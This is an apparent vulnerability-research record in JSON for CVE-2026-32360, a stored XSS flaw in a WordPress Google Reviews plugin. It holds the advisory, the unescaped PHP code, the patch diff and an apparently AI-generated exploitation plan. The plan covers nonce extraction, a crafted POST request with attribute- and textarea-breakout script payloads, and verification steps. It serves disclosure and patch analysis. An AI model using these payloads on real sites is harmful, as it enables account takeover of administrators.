[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-fb5KkFrH1VO-H4mYHdKOStvUyN8RGXoyuuT35_JVbQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32360","rich-showcase-for-google-reviews-authenticated-editor-stored-cross-site-scripting","Rich Showcase for Google Reviews \u003C= 6.9.4.3 - Authenticated (Editor+) Stored Cross-Site Scripting","The Rich Showcase for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.9.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","widget-google-reviews",null,"\u003C=6.9.4.3","6.9.4.4","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-15 00:00:00","2026-04-15 21:05:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fce75f50d-a9d9-4e4e-85b2-6e15ffa77a94?source=api-prod",60,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fpublic-main-rtl.css","assets\u002Fcss\u002Fpublic-main.css","assets\u002Fjs\u002Fadmin-main.js","assets\u002Fjs\u002Fpublic-main.js","assets\u002Fsrc\u002Fjs\u002Fadmin-builder.js","grw.php","includes\u002Fclass-builder-page.php","includes\u002Fclass-view.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-32360\n\n## 1. Vulnerability Summary\nThe **Rich Showcase for Google Reviews** plugin (version \u003C= 6.9.4.3) is vulnerable to **Authenticated (Editor+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize or escape feed configuration data (specifically the title and content fields) before rendering them in the administrative \"Builder\" interface.\n\nIn standard WordPress environments, Editors have the `unfiltered_html` capability, which allows them to save scripts. However, this plugin fails to properly escape this data during output, meaning that in **Multi-site** environments or installations where `unfiltered_html` is disabled, an Editor can still bypass restrictions to store and execute arbitrary JavaScript that will fire when an Administrator visits the settings page.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Admin Page**: `wp-admin\u002Fadmin.php?page=grw-builder`\n- **Vulnerable Form Action**: `admin-post.php?action=grw_feed_save`\n- **Vulnerable Parameters**: \n    - `grw_feed[title]`\n    - `grw_feed[content]`\n- **Authentication Level**: Editor or higher.\n- **Preconditions**: Multi-site installation or `unfiltered_html` disabled (e.g., `define('DISALLOW_UNFILTERED_HTML', true);`).\n\n## 3. Code Flow\n1. **Input**: An Editor submits the \"Connect Reviews\" form in the Builder.\n2. **Persistence**: The form maps to `admin-post.php?action=grw_feed_save`. The plugin (via its `Feed_Controller`, inferred from the `Post_Types::FEED_POST_TYPE . '_save'` action) saves the `grw_feed[title]` and `grw_feed[content]` into a custom post type (likely `grw_feed`).\n3. **Retrieval**: When the Builder page is loaded (`includes\u002Fclass-builder-page.php`), the `render()` function retrieves the feed object:\n   ```php\n   $feed_post_title = $feed->post_title;\n   $feed_content = trim($feed->post_content);\n   ```\n4. **Sink (Title)**: The `post_title` is echoed raw into an `input` value attribute:\n   ```php\n   \u002F\u002F includes\u002Fclass-builder-page.php:97\n   \u003Cinput id=\"grw_title\" ... value=\"\u003C?php if (isset($feed_post_title)) { echo $feed_post_title; } ?>\" ...>\n   ```\n5. **Sink (Content)**: The `post_content` is echoed raw into a `textarea`:\n   ```php\n   \u002F\u002F includes\u002Fclass-builder-page.php:112\n   \u003Ctextarea id=\"grw-builder-connection\" ...>\u003C?php echo $feed_content; ?>\u003C\u002Ftextarea>\n   ```\n\n## 4. Nonce Acquisition Strategy\nThe form uses a WordPress nonce for protection, registered with the action `grw_wpnonce`.\n\n1. **Shortcode\u002FPage**: The Builder page `wp-admin\u002Fadmin.php?page=grw-builder` contains the nonce.\n2. **Extraction**:\n   - Navigate to `wp-admin\u002Fadmin.php?page=grw-builder` as an Editor.\n   - Use `browser_eval` to extract the nonce from the hidden input field:\n     ```javascript\n     document.querySelector('input[name=\"grw_nonce\"]').value\n     ```\n\n## 5. Exploitation Strategy\n### Step 1: Identify Post Type Slug\nConfirm that `Post_Types::FEED_POST_TYPE` is `grw_feed`. (Inferred from parameter names in `class-builder-page.php`).\n\n### Step 2: Extract Nonce\n- Login as Editor.\n- Navigate to `wp-admin\u002Fadmin.php?page=grw-builder`.\n- Execute `browser_eval` to get the value of `grw_nonce`.\n\n### Step 3: Inject Payload via POST\nSend a POST request to `admin-post.php` to save a new feed configuration with the payload.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-post.php?action=grw_feed_save`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Parameters**:\n    - `grw_nonce`: `[EXTRACTED_NONCE]`\n    - `grw_feed[post_id]`: (empty for new)\n    - `grw_feed[title]`: `\">\u003Cscript>alert(\"XSS_TITLE\")\u003C\u002Fscript>`\n    - `grw_feed[content]`: `\u003C\u002Ftextarea>\u003Cscript>alert(\"XSS_CONTENT\")\u003C\u002Fscript>`\n    - `grw_feed[current_url]`: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=grw-builder`\n\n### Step 4: Trigger Execution\nThe plugin will redirect to the Builder page for the newly created ID (e.g., `?page=grw-builder&grw_feed_id=123`).\n- Follow the redirect or manually navigate to the new ID.\n- The browser should trigger two alerts: one from the title attribute breakout and one from the textarea breakout.\n\n## 6. Test Data Setup\n1. **User**: Create a user with the `Editor` role.\n2. **Environment Restriction**: Ensure the test environment has `unfiltered_html` disabled to prove the vulnerability bypasses expected security controls:\n   ```bash\n   wp config set DISALLOW_UNFILTERED_HTML true --raw\n   ```\n3. **Plugin Activation**: Ensure \"Rich Showcase for Google Reviews\" is active.\n\n## 7. Expected Results\n- The POST request should return a `302 Redirect`.\n- The redirection URL should contain a `grw_feed_id` parameter.\n- Upon loading the redirect URL, the HTML source should contain:\n  ```html\n  \u003Cinput id=\"grw_title\" ... value=\"\">\u003Cscript>alert(\"XSS_TITLE\")\u003C\u002Fscript>\">\n  ...\n  \u003Ctextarea ...>\u003C\u002Ftextarea>\u003Cscript>alert(\"XSS_CONTENT\")\u003C\u002Fscript>\u003C\u002Ftextarea>\n  ```\n- JavaScript execution (`alert`) occurs in the context of the logged-in user.\n\n## 8. Verification Steps\n1. **Database Check**: Verify the payload is stored in the `wp_posts` table for the `grw_feed` post type:\n   ```bash\n   wp post list --post_type=grw_feed --fields=ID,post_title,post_content\n   ```\n2. **Visual Check**: Use `browser_navigate` to the feed URL and confirm the alert appears.\n\n## 9. Alternative Approaches\nIf the `admin-post.php` handler restricts creation to specific roles or requires an existing `post_id`, first create a \"Feed\" legitimately via the UI, then capture the `post_id` and perform the update via the same POST endpoint using the legitimate ID.\n\nIf the Editor cannot access the Builder page due to additional capability checks, verify if the `grw_rateus_ajax_feedback` action (found in `assets\u002Fjs\u002Fadmin-main.js`) also stores data unsafely, although that is a different endpoint.","The Rich Showcase for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'grw_feed' title and content parameters. Authenticated attackers with editor-level permissions can inject arbitrary scripts into these fields, which execute when an administrator visits the plugin's builder interface, particularly in environments where unfiltered_html is disabled.","\u002F\u002F includes\u002Fclass-builder-page.php line 97\n\u003Cinput id=\"grw_title\" class=\"grw-toolbar-title-input\" type=\"text\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[title]\" value=\"\u003C?php if (isset($feed_post_title)) { echo $feed_post_title; } ?>\" placeholder=\"Enter a widget name\" maxlength=\"255\" autofocus>\n\n---\n\n\u002F\u002F includes\u002Fclass-builder-page.php line 112\n\u003Ctextarea id=\"grw-builder-connection\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[content]\" style=\"display:none\">\u003C?php echo $feed_content; ?>\u003C\u002Ftextarea>","--- includes\u002Fclass-builder-page.php\n+++ includes\u002Fclass-builder-page.php\n@@ -94,7 +94,7 @@\n                 \u003Cdiv class=\"grw-builder-workspace\">\n                     \u003Cdiv class=\"grw-toolbar\">\n                         \u003Cdiv class=\"grw-toolbar-title\">\n-                            \u003Cinput id=\"grw_title\" class=\"grw-toolbar-title-input\" type=\"text\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[title]\" value=\"\u003C?php if (isset($feed_post_title)) { echo $feed_post_title; } ?>\" placeholder=\"Enter a widget name\" maxlength=\"255\" autofocus>\n+                            \u003Cinput id=\"grw_title\" class=\"grw-toolbar-title-input\" type=\"text\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[title]\" value=\"\u003C?php if (isset($feed_post_title)) { echo esc_attr($feed_post_title); } ?>\" placeholder=\"Enter a widget name\" maxlength=\"255\" autofocus>\n                         \u003C\u002Fdiv>\n                         \u003Cdiv class=\"grw-toolbar-control\">\n                             \u003C?php if ($feed_inited) {\n@@ -109,7 +109,7 @@\n                         \u003C\u002Fdiv>\n                     \u003C\u002Fdiv>\n                     \u003Cdiv class=\"grw-builder-preview\">\n-                        \u003Ctextarea id=\"grw-builder-connection\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[content]\" style=\"display:none\">\u003C?php echo $feed_content; ?>\u003C\u002Ftextarea>\n+                        \u003Ctextarea id=\"grw-builder-connection\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[content]\" style=\"display:none\">\u003C?php echo esc_textarea($feed_content); ?>\u003C\u002Ftextarea>\n                         \u003Cdiv id=\"grw_collection_preview\">\n                             \u003C?php","1. Gain access to a WordPress account with Editor or higher privileges.\n2. In environments where 'unfiltered_html' is disabled (like WordPress Multi-site), navigate to the 'Connect Reviews' builder page to retrieve a valid 'grw_nonce'.\n3. Construct a POST request to '\u002Fwp-admin\u002Fadmin-post.php?action=grw_feed_save' including the nonce and malicious payloads.\n4. For the title field (grw_feed[title]), use a payload like '\">\u003Cscript>alert(1)\u003C\u002Fscript>' to break out of the input value attribute.\n5. For the content field (grw_feed[content]), use a payload like '\u003C\u002Ftextarea>\u003Cscript>alert(1)\u003C\u002Fscript>' to break out of the textarea element.\n6. The scripts will be stored in the database and execute whenever a user (such as an Administrator) loads the feed configuration in the plugin's builder interface.","gemini-3-flash-preview","2026-04-20 22:23:36","2026-04-20 22:24:12",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","6.9.4.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-google-reviews\u002Ftags\u002F6.9.4.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-google-reviews.6.9.4.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-google-reviews\u002Ftags\u002F6.9.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-google-reviews.6.9.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-google-reviews\u002Ftags"]